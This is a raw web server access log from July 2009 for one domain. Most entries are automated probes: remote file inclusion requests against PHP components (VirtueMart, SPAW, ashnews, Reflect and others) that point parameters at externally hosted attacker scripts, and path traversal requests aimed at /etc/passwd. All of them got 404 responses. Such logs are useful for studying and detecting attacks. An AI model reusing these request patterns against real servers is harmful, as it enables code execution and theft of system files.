195.34.78.110 - - [04/Jul/2009:10:20:11 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:12 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:15 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:16 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:20:16 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:20:28 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:20:28 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:20:28 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:10:21:42 -0700] "GET /logs/access.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:17 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:17 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:17 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:23 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:23 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:23 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:30 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:30 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:31 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:34 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:34 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:10:24:34 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:24:44 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:10:25:00 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
204.62.55.11 - - [04/Jul/2009:10:30:48 -0700] "GET /logs/access_090606.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:10:33:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:08 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:08 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:08 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:09 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:09 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:10:35:09 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:06 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:06 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:06 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:12 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:12 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:48:12 -0700] "GET /logs/access.log//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:20 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:21 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:23 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:24 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:25 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:48 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:49 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:50 -0700] "GET /logs/access.log//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:55 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:55 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:57 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:59 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:59 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:10:49:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:02 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:05 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:07 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:09 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:10 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:12 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
88.131.106.5 - - [04/Jul/2009:10:52:23 -0700] "GET /logs/ HTTP/1.0" 200 1637 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:10:57:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:10:57:22 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:10:57:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:10:58:16 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:10:58:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
81.21.75.36 - - [04/Jul/2009:10:58:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
81.21.75.36 - - [04/Jul/2009:10:58:33 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
81.21.75.36 - - [04/Jul/2009:10:58:33 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:00:14 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:00:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
124.0.73.130 - - [04/Jul/2009:11:01:52 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.0.73.130 - - [04/Jul/2009:11:01:52 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.0.73.130 - - [04/Jul/2009:11:01:53 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:03:59 -0700] "GET /logs/access_090212.log%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:03:59 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:03:59 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:07 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:07 -0700] "GET /logs/access.log//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:07 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:09 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:09 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:09 -0700] "GET /logs/access.log//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:24 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:24 -0700] "GET /logs/access_090212.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:24 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:11:05:30 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:11:05:30 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:11:05:30 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:40 -0700] "GET /logs/access_090212.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:41 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:41 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:41 -0700] "GET /logs/access.log%20%20//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:41 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:41 -0700] "GET /logs/access.log%20%20//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:05:42 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:44 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:05:44 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:08:05 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:08:08 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:08:08 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:11:08:10 -0700] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:09:58 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:09:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:09:58 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:10:35 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:10:35 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:10:36 -0700] "GET /logs/access.log%20%20//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.29.124 - - [04/Jul/2009:11:11:59 -0700] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:16 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:20 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
